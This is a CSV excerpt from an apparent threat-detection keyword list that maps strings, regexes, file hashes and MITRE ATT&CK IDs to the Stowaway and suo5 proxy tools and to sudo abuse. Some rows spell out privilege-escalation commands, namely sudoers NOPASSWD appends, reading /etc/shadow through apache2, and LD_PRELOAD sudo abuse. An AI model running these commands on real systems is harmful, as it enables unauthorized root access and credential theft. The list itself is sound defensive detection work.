"*/linux_x64_agent*",".{0,1000}\/linux_x64_agent.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z"
"*/linux_x86_admin*",".{0,1000}\/linux_x86_admin.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z"
"*/linux_x86_agent*",".{0,1000}\/linux_x86_agent.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z"
"*.server_DoElevationRequest((Get-NtProcess -ProcessId $pid)*""cmd.exe""*C:\""*",".{0,1000}\.server_DoElevationRequest\(\(Get\-NtProcess\s\-ProcessId\s\$pid\).{0,1000}\""cmd\.exe\"".{0,1000}C\:\\\"".{0,1000}","greyware_tool_keyword","sudo","sudo on windows allowing privilege escalation","T1068 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://www.tiraniddo.dev/2024/02/sudo-on-windows-quick-rundown.html","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*Connect-RpcClient * -EndpointPath sudo_elevate_4652*",".{0,1000}Connect\-RpcClient\s.{0,1000}\s\-EndpointPath\ssudo_elevate_4652.{0,1000}","greyware_tool_keyword","sudo","sudo on windows allowing privilege escalation","T1068 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://www.tiraniddo.dev/2024/02/sudo-on-windows-quick-rundown.html","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*echo *%sudo  ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*",".{0,1000}echo\s.{0,1000}\%sudo\s\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*sudo apache2 -f /etc/shadow*",".{0,1000}sudo\sapache2\s\-f\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sudo LD_LIBRARY_PATH=. apache2*",".{0,1000}sudo\sLD_LIBRARY_PATH\=\.\sapache2.{0,1000}","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option  to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sudo LD_PRELOAD=/tmp/preload.so find*",".{0,1000}sudo\sLD_PRELOAD\=\/tmp\/preload\.so\sfind.{0,1000}","greyware_tool_keyword","sudo","abusinf LD_PREDLOAD option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=NOPASSWD\:\s\/bin\/bash.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/suo5.git*",".{0,1000}\/suo5\.git.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5/releases/*",".{0,1000}\/suo5\/releases\/.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-darwin-amd64*",".{0,1000}\/suo5\-darwin\-amd64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-darwin-arm64*",".{0,1000}\/suo5\-darwin\-arm64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-gui-darwin.app.zip*",".{0,1000}\/suo5\-gui\-darwin\.app\.zip.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-gui-linux*",".{0,1000}\/suo5\-gui\-linux.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-gui-windows.exe*",".{0,1000}\/suo5\-gui\-windows\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-linux-amd64*",".{0,1000}\/suo5\-linux\-amd64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-linux-arm64*",".{0,1000}\/suo5\-linux\-arm64.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*/suo5-windows-amd64.exe*",".{0,1000}\/suo5\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*:8070/tomcat/code/suo5.jsp*",".{0,1000}\:8070\/tomcat\/code\/suo5\.jsp.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*\suo5-gui-darwin.app.zip*",".{0,1000}\\suo5\-gui\-darwin\.app\.zip.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*\suo5-gui-windows.exe*",".{0,1000}\\suo5\-gui\-windows\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*\suo5-windows-amd64.exe*",".{0,1000}\\suo5\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*01a2453132babc0a02bf8a02a5dce58e75a6c4fe9bddbcc5659141fff047a13f*",".{0,1000}01a2453132babc0a02bf8a02a5dce58e75a6c4fe9bddbcc5659141fff047a13f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*01d500c870f17df9745b6973a23efd33c05fe74680bb6bc1a0b5b74681480996*",".{0,1000}01d500c870f17df9745b6973a23efd33c05fe74680bb6bc1a0b5b74681480996.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*025c823bad7f5449606f1eebb3f486e723e6b41f3d809b59c0b4f2367ef14b41*",".{0,1000}025c823bad7f5449606f1eebb3f486e723e6b41f3d809b59c0b4f2367ef14b41.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*0b1359c7b13b51d57bc917ca161f659550137e223ae0e317c3b4911fdfe59c7e*",".{0,1000}0b1359c7b13b51d57bc917ca161f659550137e223ae0e317c3b4911fdfe59c7e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*13dc14feae0ebb2947f49a047754133869fcefe72931f156232d109bc7fc9e03*",".{0,1000}13dc14feae0ebb2947f49a047754133869fcefe72931f156232d109bc7fc9e03.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*14cb4039e1416fce558039dc2548cf185ae6e695479440d711992b238da6ef14*",".{0,1000}14cb4039e1416fce558039dc2548cf185ae6e695479440d711992b238da6ef14.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*16ab17e1d91f55e133cea7ca0fcc38d0105b48e05975d86db76b556057e8ca8b*",".{0,1000}16ab17e1d91f55e133cea7ca0fcc38d0105b48e05975d86db76b556057e8ca8b.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*1792c809507a1b92737bd04b12cabaf28b36e7fc08ae524704317679ddb62844*",".{0,1000}1792c809507a1b92737bd04b12cabaf28b36e7fc08ae524704317679ddb62844.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*17c6bc3e9a1d4086f3079f9bc140362f1278b8364777020b9ddddecf5fa7da94*",".{0,1000}17c6bc3e9a1d4086f3079f9bc140362f1278b8364777020b9ddddecf5fa7da94.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*17fd691675f7b9dcfe22195f729177613116448c4b5173e5f035bb4a3f67a361*",".{0,1000}17fd691675f7b9dcfe22195f729177613116448c4b5173e5f035bb4a3f67a361.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*19d9a81e3487b8a0624b927ca9a0703a716a383d41d61a22d4a1e20777713923*",".{0,1000}19d9a81e3487b8a0624b927ca9a0703a716a383d41d61a22d4a1e20777713923.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*1a863b55ce99ee16151b756a7e9a26ac2b8d86e7bfa69ff99a6c0883ea25a6a6*",".{0,1000}1a863b55ce99ee16151b756a7e9a26ac2b8d86e7bfa69ff99a6c0883ea25a6a6.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*1af99ff0796b156af3e46c20926f5aa5bd30e82821d7def568eae8a62ed44819*",".{0,1000}1af99ff0796b156af3e46c20926f5aa5bd30e82821d7def568eae8a62ed44819.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*1b6c1c7541fe63d8b93d2ecdd39fa84fbabe464ad75fc822ccdea8b8bb0e3e56*",".{0,1000}1b6c1c7541fe63d8b93d2ecdd39fa84fbabe464ad75fc822ccdea8b8bb0e3e56.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*1da8555f3513b39d821fc95a6a76ed4cd1b56ffcb30fc13c0eda59576ba5ebc4*",".{0,1000}1da8555f3513b39d821fc95a6a76ed4cd1b56ffcb30fc13c0eda59576ba5ebc4.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*1fd13e23e6e0959dc50d24207282f3873937f2e97c5f20205cef84d58dacc676*",".{0,1000}1fd13e23e6e0959dc50d24207282f3873937f2e97c5f20205cef84d58dacc676.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*201281dccb6437ae62550434e78ff9cae3c2c19b7af8e9e55a3d1e89e32342d4*",".{0,1000}201281dccb6437ae62550434e78ff9cae3c2c19b7af8e9e55a3d1e89e32342d4.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*213021164bd91cb9caa8ea2ea283ff353349778d7e6e3c456a83224c11e55e3e*",".{0,1000}213021164bd91cb9caa8ea2ea283ff353349778d7e6e3c456a83224c11e55e3e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*21f3a4015365376e1ba970afadcdf7ac5a13ba78feea2ed22f18de63872f2daa*",".{0,1000}21f3a4015365376e1ba970afadcdf7ac5a13ba78feea2ed22f18de63872f2daa.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*2925973758d3d69cd2a8d4e6b504b367d4d664faecf422e49e614622d7cdb7d5*",".{0,1000}2925973758d3d69cd2a8d4e6b504b367d4d664faecf422e49e614622d7cdb7d5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*338e40f0af3c9e5afe576a70b19b005239fb97bd028891a1040ffd974927070f*",".{0,1000}338e40f0af3c9e5afe576a70b19b005239fb97bd028891a1040ffd974927070f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*37f9d73191d95d637f39fdc07f8ddead00f0093d3459a43b7b3f8e00ecf261af*",".{0,1000}37f9d73191d95d637f39fdc07f8ddead00f0093d3459a43b7b3f8e00ecf261af.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*3a4957346500bfcb99f671ffde44447a7d25da2f17e9ceefd68944beceb687b2*",".{0,1000}3a4957346500bfcb99f671ffde44447a7d25da2f17e9ceefd68944beceb687b2.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*3b03a0738da391cc91566ea46c9b2a672546a0dcca12d3c6f2c10664c8c8e100*",".{0,1000}3b03a0738da391cc91566ea46c9b2a672546a0dcca12d3c6f2c10664c8c8e100.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*3c6bef218514ed8b5f4b07dac9005fa1f844750589c60d9c39e8ac2c2b6c6373*",".{0,1000}3c6bef218514ed8b5f4b07dac9005fa1f844750589c60d9c39e8ac2c2b6c6373.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*3d4704e3a7c0c5d4d1c0a272160e7d0944a017cea7cb08b367689f89516e4e6c*",".{0,1000}3d4704e3a7c0c5d4d1c0a272160e7d0944a017cea7cb08b367689f89516e4e6c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*3dec7fe9898d3e4b31c6d61a1316390572bc6964128f14ad1595e4b252e10085*",".{0,1000}3dec7fe9898d3e4b31c6d61a1316390572bc6964128f14ad1595e4b252e10085.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*402b28519547fad2da345db67120a53369c50bfa90807fff186e3cdafad82de1*",".{0,1000}402b28519547fad2da345db67120a53369c50bfa90807fff186e3cdafad82de1.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*40b9410d301646531ac34beb1e22c3ac94742d21fd0d701b8b9b4fa04481e6fb*",".{0,1000}40b9410d301646531ac34beb1e22c3ac94742d21fd0d701b8b9b4fa04481e6fb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*40dbbb8a09fa361ae16c91c374e435391b9104989241ba67389e2dc15d9e6034*",".{0,1000}40dbbb8a09fa361ae16c91c374e435391b9104989241ba67389e2dc15d9e6034.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*44ce6895d6f3ed6945853af571d2ac24cb04a55ff4fa9425952181b840a028d2*",".{0,1000}44ce6895d6f3ed6945853af571d2ac24cb04a55ff4fa9425952181b840a028d2.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*45bc362420127dc6d00395da6c61d94036da73d110119965a52a8d83a5a88d31*",".{0,1000}45bc362420127dc6d00395da6c61d94036da73d110119965a52a8d83a5a88d31.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*4749831085b1c88950bff5d47d87409a05018597224f4149a22844163e6e1b75*",".{0,1000}4749831085b1c88950bff5d47d87409a05018597224f4149a22844163e6e1b75.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*482f372f9e30c5d31eb06c3ca96f4ae58df4aee2e714b1a613f21d99f478dfcf*",".{0,1000}482f372f9e30c5d31eb06c3ca96f4ae58df4aee2e714b1a613f21d99f478dfcf.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*48ca8e0be856ea824d915079a443f1aeca29ec805290d8605066f7ab59401abe*",".{0,1000}48ca8e0be856ea824d915079a443f1aeca29ec805290d8605066f7ab59401abe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*4f6a58fe1d179d2c9811e76d2cc469b5843bb5fddf9a5561b2b257810ae9416c*",".{0,1000}4f6a58fe1d179d2c9811e76d2cc469b5843bb5fddf9a5561b2b257810ae9416c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*501555b3f33f3591deab2ab1b070502b45d63cf3c744661b7a32edc8f498e6ed*",".{0,1000}501555b3f33f3591deab2ab1b070502b45d63cf3c744661b7a32edc8f498e6ed.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*50d81308031ff4cd24705d157d6c5cf7d6e8afe7bec4bb2bbbadbd6699ad7a3f*",".{0,1000}50d81308031ff4cd24705d157d6c5cf7d6e8afe7bec4bb2bbbadbd6699ad7a3f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*52ca645cfcf80cfa3278dc9ec47105cd22995f39028082ba209a4ebcbb7844fe*",".{0,1000}52ca645cfcf80cfa3278dc9ec47105cd22995f39028082ba209a4ebcbb7844fe.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*54f11fb39afb17eeaa9c68482cf68e415ed87c3eb80f2fa9ead6431ddcf25bcc*",".{0,1000}54f11fb39afb17eeaa9c68482cf68e415ed87c3eb80f2fa9ead6431ddcf25bcc.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*55639c41a6ce5640182e63fbada1460f4d5eb77d7ca28cd03b5f81326a5ffd08*",".{0,1000}55639c41a6ce5640182e63fbada1460f4d5eb77d7ca28cd03b5f81326a5ffd08.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
